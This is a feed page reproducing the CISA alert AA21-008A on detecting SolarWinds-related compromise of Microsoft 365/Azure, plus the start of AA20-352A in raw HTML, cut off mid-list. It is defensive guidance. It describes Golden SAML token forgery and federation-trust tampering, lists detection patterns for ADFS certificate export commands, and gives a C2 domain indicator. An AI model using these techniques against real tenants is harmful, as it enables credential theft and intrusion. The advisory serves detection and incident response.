US CERT: Technical Security Alerts

Subscribe to US CERT: Technical Security Alerts hírcsatorna
Alerts warn about vulnerabilities, incidents, and other security issues that pose a significant risk.
Frissítve: 2 óra 51 perc
2021. január 8.

AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments

Original release date: January 8, 2021
Summary

This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

This Alert is a companion alert to AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. AA20-352A primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products.

This Alert also addresses activity—irrespective of the initial access vector leveraged—that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations. These tactics, techniques, and procedures (TTPs) feature three key components:

  • Compromising or bypassing federated identity solutions;
  • Using forged authentication tokens to move laterally to Microsoft cloud environments; and
  • Using privileged access to a victim’s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access.

This Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools—including a CISA-developed tool, Sparrow—for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity.

Note: this Alert describes artifacts—presented by these attacks—from which CISA has identified detectable evidence of the threat actor’s initial objectives. CISA continues to analyze the threat actor’s follow-on objectives.

Technical Details

Frequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Supernova).[1] However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products.

CISA observed this threat actor moving from user context to administrator rights for Privilege Escalation [TA0004] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability. This enumeration allows threat actors to forge authentication tokens (OAuth) to issue claims to service providers—without having those claims checked against the identity provider—and then to move laterally to Microsoft Cloud environments (Lateral Movement [TA0008]).

The threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication. This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (Lateral Movement [TA0008]) through trust boundaries, evade defenses and detection (Defense Evasion [TA0005]), and steal sensitive data (Collection [TA0009]).

This level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering.

MitigationsDetection

Guidance on identifying affected SolarWinds software is well documented.[2] However—once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs—identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics.

The nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors. Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[3]

Detection Tools

CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA.

There are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[4] Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include:

  • CISA's Sparrow,
  • Open-source utility Hawk, and
  • CrowdStrike's Azure Reporting Tool (CRT).

Additionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion.

Note: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated.

General Guidance on Using Detection Tools
  1. Audit the creation and use of service principal credentials. Look for unusual application usage, such as use of dormant applications.
  2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships added to the Azure Active Directory.
  3. Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product. Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor.
Sparrow

CISA created Sparrow to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data. It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications.

CISA advises Sparrow users to take the following actions.

  1. Use Sparrow to detect any recent domain authentication or federation modifications.
    1. Domain and federation modification operations are uncommon and should be investigated.
  2. Examine logs for new and modified credentials applied to applications and service principals; delineate for the credential type. Sparrow can be used to detect the modification of service principals and application credentials.
    1. Create a timeline for all credential changes, focusing on recent wholesale changes.
    2. Review the “top actors” for activity in the environment and the number of credential modifications performed.
    3. Monitor changes in application and service principal credentials.
    4. Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.
  3. Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role.
  4. Use Sparrow to detect OAuth consent and users’ consent to applications, which is useful for interpreting changes in adversary TTPs.
  5. Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationValue of 16457, which is an indicator of how a SAML token was built and is a potential indicator for forged SAML tokens.
    1. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources.
  6. Review the PowerShell logs that Sparrow exports.
    1. Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions.
    2. Review PowerShell usage for users with PowerShell in the environment.
  7. Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD.
    1. Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy https://graph.windows.net/ or https://graph.microsoft.com). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources.
  8. Review Sparrow’s listed tenant’s Azure AD domains, to see if the domains have been modified.
  9. For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users’ mailboxes. Use Sparrow to query for a specific application ID using the app id investigation capability, which will check to see if it is accessing mail or file items.
    1. The MailItemsAccessed event provides audibility for mailbox data accessed via mail protocols or clients.
    2. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[5]
    3. The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis.
    4. Check for changes to applications with regards to the accessing of resources such as mail or file items.
Hawk

Hawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations.

Hawk users should review login details for administrator accounts and take the following steps.

  1.  Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins).
  2. Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes.
    1. PowerShell logging does not reveal the exact cmdlet that was run on the tenant.
  3. Look for users with unusual sign-in locations, dates, and times.
  4. Check permissions of service principals and applications in M365/Azure AD.
  5. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items.
  6. Review mailbox rules and recent mailbox rule changes.
CrowdStrike Azure Reporting Tool

CrowdStrike's Azure Reporting Tool (CRT) can help network defenders analyze their Microsoft Azure AD and M365 environment to help organizations analyze permissions in their AzureAD tenant and service configuration. This tool has minor overlap with Sparrow; it shows unique items, but it does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and could be used to complement Sparrow.

Detection Tool Distinctions
  • Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks.
  • CRT focuses on the tenant’s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk.
  • CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk.
  • As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks.
  • CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains.
  • Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials.
Detection Methods

Microsoft breaks the threat actor’s recent activity into four primary stages, which are described below along with associated detection methods. Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[6]

Note: this step provides an entry vector to cloud technology environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud(e.g., without leveraging the SolarWinds Orion vulnerability).

Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider

These attacks (often referred to as “Golden Security Assertion Markup Language” attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[7] For example, network defenders can use OAuth claims for specific principals made at the Azure AD level and compare them to the on-premises identity.

Export sign-in logs from the Azure AD portal and look at the Authentication Method field.

Note: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort.

Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers

Using SAML single sign-on, search for any logins to service providers that do not have corresponding event IDs 4769, 1200, and 1202 in the domain.

Detection Method 2: Identifying certificate export events in ADFS

Look for:

  1. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500.
  2. Export-PfxCertificate or certutil-exportPFX in Event IDs 4103 and 4104, which may include detection of a certificate extraction technique.
  3. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \microsoft##wid\tsql\query (exclude processes regularly making this pipe connection on the machine).
  4. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event).

Detection Method 3: Customizing SAML response to identify irregular access

This method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward. Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[8]

Detection Method 4: Detecting malicious ADFS trust modification

A threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[9]
Network defenders should look for:

  1. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.)
    1. Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain.
  2. Possible activity of an interrogating ADFS host by using ADFS PowerShell plugins. Look for changes in the federation trust environment that would indicate new ADFS sources.

Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as AzureAD (establishing a foothold)

After the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants).

The threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged AzureAD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud).

Network defenders should take the following steps.

  1. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials.
    1. Look for unusual application usage, such as dormant or forgotten applications being used again.
    2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application.
  2. Look for unexpected trust relationships that have been added to AzureAD. (Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.).[10]
  3. Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations.
  4. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times.
  5. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor’s attempts to gain persistence.

Stage 3: Acquiring an OAuth access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application

In some cases, the threat actor has been observed adding permissions to existing applications or service principals. Additionally the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using it to add a credential to another service principal, and then deleting it).[11]

Network defenders should use Sparrow to:

  1. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times.
  2. Create a timeline for all credential changes.
  3. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export).
  4. Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions).
    1. Export and view this activity via the ServicePrincipal_Operations_Export.
  5. Record OAuth consent and consent to applications
    1. Export and view this record via the Consent_Operations_Export file.
  6. Investigate instances of excessive high permissions, including, but not limited to Exchange Online, Microsoft Graph, and Azure AD Graph.
    1. Review Microsoft Graph API permissions granted to service principals.
    2. Export and view this activity via the ApplicationGraphPermissions csv file.
      1. Note: Hawk can also return the full list of service principal permissions for further investigation.
    3. Review top actors and the amount of credential modifications performed.
    4. Monitor changes in application credentials.
  7. Identify manipulation of custom or third-party applications.
    1. Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts.
  8. Review modifications to federation trust settings.
    1. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor.
      1. The script detects the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. Export this data into csv called AppRoleAssignment_Operations_Export.

Stage 4: Once access has been established, the threat actor Uses Microsoft Graph API to conduct action on objectives from an external RESTful API (queries impersonating existing applications).

Network defenders should:

  1. In MailItemsAccessed  operations, found within the Unified Audit Log (UAL), review the application ID used (requires G5 or E5 license for this specific detail).
  2. Query the specific application ID, using the Sparrow script’s app ID investigation capability to interrogate mail and file items accessed for that applicationID (Use the application ID utility for any other suspicious apps that require additional analysis.).
  3. Check the permissions of an application in M365/AzureAD using Sparrow.
    1. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions.
    2. Network defenders will see the IP address that Graph API uses.
    3. Note: the Microsoft IP address may not show up as a virtual private server/anonymized endpoint.
  4. Investigate a specific service principal, if it is a user-specific user account, in Hawk. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal.
Microsoft Telemetry Nuances

The existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL.

Service principal logging is available using the Azure Portal via the "Service Principal Sign-ins" feature. Enable settings in the Azure Portal (see “Diagnostic Setting”) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure Premium P1 or Premium P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[12] These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section.

Global Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel. According to CrowdStrike, "There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible."[13]

Documentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available in the M365 Unified Access Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources.

The use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context.

A properly configured SIEM can provide:

  1. Longer term storage of log data.
  2. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information.
  3. Ability to query use of application connectors in Azure.

Built-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&CK framework and easy-to-understand dashboards.[14] However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

  • 1-888-282-0870 (From outside the United States: +1-703-235-8832)
  • central@cisa.dhs.gov (UNCLASS)
  • us-cert@dhs.sgov.gov (SIPRNET)
  • us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Resources

Azure Active Directory Workbook to Assess Solorigate Risk: https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718

Volexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

How to Find Activity with Sentinel: https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/

Third-Party Walkthrough of the Attack: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/

National Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF

Microsoft 365 App for Splunk: https://splunkbase.splunk.com/app/3786/

CISA Remediation Guidance: https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Feedback

CISA strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.cisa.gov/forms/feedback.

References Revisions
  • Initial version: January 8, 2021

This product is provided subject to this Notification and this Privacy & Use policy.

2020. december 17.

AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

Original release date: December 17, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href="https://attack.mitre.org/versions/v8/">ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor tactics and techniques.</em></p> <p>The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an advanced persistent threat (APT) actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions. CISA expects that removing this threat actor from compromised environments will be highly complex and challenging for organizations.</p> <p>One of the initial access vectors for this activity is a supply chain compromise of the following SolarWinds Orion products (see Appendix A).</p> <ul> <li>Orion Platform 2019.4 HF5, version 2019.4.5200.9083</li> <li>Orion Platform 2020.2 RC1, version 2020.2.100.12219</li> <li>Orion Platform 2020.2 RC2, version 2020.2.5200.12394</li> <li>Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432</li> </ul> <p><strong>Note:</strong> CISA has evidence of additional initial access vectors, other than the SolarWinds Orion platform; however, these are still being investigated. CISA will update this Alert as new information becomes available.</p> <p>On December 13, 2020, CISA released <a href="https://cyber.dhs.gov/ed/21-01/">Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise</a>, ordering federal civilian executive branch departments and agencies to disconnect affected devices. <strong>Note:</strong> this Activity Alert does not supersede the requirements of Emergency Directive 21-01 (ED-21-01) and does not represent formal guidance to federal agencies under ED 21-01.</p> <p>CISA has determined that this threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations. CISA advises stakeholders to read this Alert and review the enclosed indicators (see Appendix B).</p> <h4>Key Takeaways</h4> <ul> <li>This is a patient, well-resourced, and focused adversary that has sustained long duration activity on victim networks.</li> <li>The SolarWinds Orion supply chain compromise is <strong><u>not</u></strong> the only initial infection vector this APT actor leveraged.</li> <li>Not all organizations that have the backdoor delivered through SolarWinds Orion have been targeted by the adversary with follow-on actions.</li> <li>Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.<em>&nbsp;</em></li> </ul> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h4>Overview</h4> <p>CISA is aware of compromises, which began at least as early as March 2020, at U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor. This threat actor has demonstrated sophistication and complex tradecraft in these intrusions. CISA expects that removing the threat actor from compromised environments will be highly complex and challenging. This adversary has demonstrated an ability to exploit software supply chains and shown significant knowledge of Windows networks. It is likely that the adversary has additional initial access vectors and tactics, techniques, and procedures (TTPs) that have not yet been discovered. CISA will continue to update this Alert and the corresponding indicators of compromise (IOCs) as new information becomes available.</p> <h4>Initial Infection Vectors [<a href="https://attack.mitre.org/versions/v8/tactics/TA0001/">TA0001</a>]</h4> <p>CISA is investigating incidents that exhibit adversary TTPs consistent with this activity, including some where victims either do not leverage SolarWinds Orion or where SolarWinds Orion was present but where there was no SolarWinds exploitation activity observed. Volexity has also reported publicly that they observed an intrusion into a think tank using, as an initial intrusion vector, a Duo multi-factor authentication bypass in Outlook Web App (OWA) to steal the secret key.[<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">1</a>] Volexity attributes this intrusion to the same activity as the SolarWinds Orion supply chain compromise, and the TTPs are consistent between the two. This observation indicates that there are other initial access vectors beyond SolarWinds Orion, and there may still be others that are not yet known.</p> <h4>SolarWinds Orion Supply Chain Compromise</h4> <p>SolarWinds Orion is an enterprise network management software suite that includes performance and application monitoring and network configuration management along with several different types of analyzing tools. SolarWinds Orion is used to monitor and manage on-premise and hosted infrastructures. To provide SolarWinds Orion with the necessary visibility into this diverse set of technologies, it is common for network administrators to configure SolarWinds Orion with pervasive privileges, making it a valuable target for adversary activity.</p> <p>The threat actor has been observed leveraging a software supply chain compromise of SolarWinds Orion products[<a href="https://www.solarwinds.com/securityadvisory">2</a>] (see Appendix A). The adversary added a malicious version of the binary <code>solarwinds.orion.core.businesslayer.dll</code> into the SolarWinds software lifecycle, which was then signed by the legitimate SolarWinds code signing certificate. This binary, once installed, calls out to a victim-specific <code>avsvmcloud[.]com</code> domain using a protocol designed to mimic legitimate SolarWinds protocol traffic. After the initial check-in, the adversary can use the Domain Name System (DNS) response to selectively send back new domains or IP addresses for interactive command and control (C2) traffic. Consequently, entities that observe traffic from their SolarWinds Orion devices to <code>avsvmcloud[.]com</code> should not immediately conclude that the adversary leveraged the SolarWinds Orion backdoor. Instead, additional investigation is needed into whether the SolarWinds Orion device engaged in further unexplained communications. If additional Canonical Name record (CNAME) resolutions associated with the <code>avsvmcloud[.]com</code> domain are observed, possible additional adversary action leveraging the back door has occurred.</p> <p>Based on coordinated actions by multiple private sector partners, as of December 15, 2020, <code>avsvmcloud[.]com</code> resolves to <code>20.140.0[.]1</code>, which is an IP address on the Microsoft blocklist. This negates any future use of the implants and would have caused communications with this domain to cease. In the case of infections where the attacker has already moved C2 past the initial beacon, infection will likely continue notwithstanding this action.</p> <p>SolarWinds Orion typically leverages a significant number of highly privileged accounts and access to perform normal business functions. Successful compromise of one of these systems can therefore enable further action and privileges in any environment where these accounts are trusted.</p> <h4>Anti-Forensic Techniques</h4> <p>The adversary is making extensive use of obfuscation to hide their C2 communications. The adversary is using virtual private servers (VPSs), often with IP addresses in the home country of the victim, for most communications to hide their activity among legitimate user traffic. The attackers also frequently rotate their “last mile” IP addresses to different endpoints to obscure their activity and avoid detection.</p> <p>FireEye has reported that the adversary is using steganography (<em>Obfuscated Files or Information: Steganography </em>[<a href="https://attack.mitre.org/versions/v8/techniques/T1027/003/">T1027.003</a>]) to obscure C2 communications.[<a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html">3</a>] This technique negates many common defensive capabilities in detecting the activity. <strong>Note:</strong> CISA has not yet been able to independently confirm the adversary’s use of this technique.</p> <p>According to FireEye, the malware also checks for a list of hard-coded IPv4 and IPv6 addresses—including RFC-reserved IPv4 and IPv6 IP—in an attempt to detect if the malware is executed in an analysis environment (e.g., a malware analysis sandbox); if so, the malware will stop further execution. Additionally, FireEye analysis identified that the backdoor implemented time threshold checks to ensure that there are unpredictable delays between C2 communication attempts, further frustrating traditional network-based analysis.</p> <p>While not a full anti-forensic technique, the adversary is heavily leveraging compromised or spoofed tokens for accounts for lateral movement. This will frustrate commonly used detection techniques in many environments. Since valid, but unauthorized, security tokens and accounts are utilized, detecting this activity will require the maturity to identify actions that are outside of a user’s normal duties. For example, it is unlikely that an account associated with the HR department would need to access the cyber threat intelligence database.</p> <p>Taken together, these observed techniques indicate an adversary who is skilled, stealthy with operational security, and is willing to expend significant resources to maintain covert presence.</p> <h4>Privilege Escalation and Persistence [<a href="https://attack.mitre.org/versions/v8/tactics/TA0004">TA0004</a>, <a href="https://attack.mitre.org/versions/v8/tactics/TA0003/">TA0003</a>]</h4> <p>The adversary has been observed using multiple persistence mechanisms across a variety of intrusions. CISA has observed the threat actor adding authentication tokens and credentials to highly privileged Active Directory domain accounts as a persistence and escalation mechanism. In many instances, the tokens enable access to both on-premise and hosted resources. Microsoft has released a query that can help detect this activity.[<a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SigninLogs/AzureAADPowerShellAnomaly.yaml">4</a>]</p> <p>Microsoft reported that the actor has added new federation trusts to existing infrastructure, a technique that CISA believes was utilized by a threat actor in an incident to which CISA has responded. Where this technique is used, it is possible that authentication can occur outside of an organization’s known infrastructure and may not be visible to the legitimate system owner. Microsoft has released a query to help identify this activity.[<a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml ">5</a>]</p> <h4>User Impersonation</h4> <p>The adversary’s initial objectives, as understood today, appear to be to collect information from victim environments. One of the principal ways the adversary is accomplishing this objective is by compromising the Security Assertion Markup Language (SAML) signing certificate using their escalated Active Directory privileges. Once this is accomplished, the adversary creates unauthorized but valid tokens and presents them to services that trust SAML tokens from the environment. These tokens can then be used to access resources in hosted environments, such as email, for data exfiltration via authorized application programming interfaces (APIs).</p> <p>CISA has observed in its incident response work adversaries targeting email accounts belonging to key personnel, including IT and incident response personnel.</p> <p>These are some key functions and systems that commonly use SAML.</p> <ul> <li>Hosted email services</li> <li>Hosted business intelligence applications</li> <li>Travel systems</li> <li>Timecard systems</li> <li>File storage services (such as SharePoint)</li> </ul> <h4>Detection: Impossible Logins</h4> <p>The adversary is using a complex network of IP addresses to obscure their activity, which can result in a detection opportunity referred to as “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). <strong>Note:</strong> implementing this detection opportunity can result in false positives if legitimate users apply virtual private network (VPN) solutions before connecting into networks.</p> <h4>Detection: Impossible Tokens</h4> <p>The following conditions may indicate adversary activity.</p> <ul> <li>Most organizations have SAML tokens with 1-hour validity periods. Long SAML token validity durations, such as 24 hours, could be unusual.</li> <li>The SAML token contains different timestamps, including the time it was issued and the last time it was used. A token having the same timestamp for when it was issued and when it was used is not indicative of normal user behavior as users tend to use the token within a few seconds but not at the exact same time of issuance.</li> <li>A token that does not have an associated login with its user account within an hour of the token being generated also warrants investigation.</li> </ul> <h4>Operational Security</h4> <p>Due to the nature of this pattern of adversary activity—and the targeting of key personnel, incident response staff, and IT email accounts—discussion of findings and mitigations should be considered very sensitive, and should be protected by operational security measures. An operational security plan needs to be developed and socialized, via out-of-band communications, to ensure all staff are aware of the applicable handling caveats.</p> <p>Operational security plans should include:</p> <ul> <li>Out-of-band communications guidance for staff and leadership;</li> <li>An outline of what “normal business” is acceptable to be conducted on the suspect network;</li> <li>A call tree for critical contacts and decision making; and</li> <li>Considerations for external communications to stakeholders and media.</li> </ul> <h4>MITRE ATT&amp;CK® Techniques</h4> <p>CISA assesses that the threat actor engaged in the activities described in this Alert uses the below-listed ATT&amp;CK techniques.</p> <ul> <li><em>Query Registry</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1012/">T1012</a>]</li> <li><em>Obfuscated Files or Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1027/">T1027</a>]</li> <li><em>Obfuscated Files or Information: Steganography</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1027/003">T1027.003</a>]</li> <li><em>Process Discovery</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1057/">T1057</a>]</li> <li><em>Indicator Removal on Host: File Deletio</em>n [<a href="https://attack.mitre.org/versions/v8/techniques/T1070/004">T1070.004</a>]</li> <li><em>Application Layer Protocol: Web Protocols</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1071/001">T1071.001</a>]</li> <li><em>Application Layer Protocol: DNS</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1071/004">T1071.004</a>]</li> <li><em>File and Directory Discovery</em> [<a 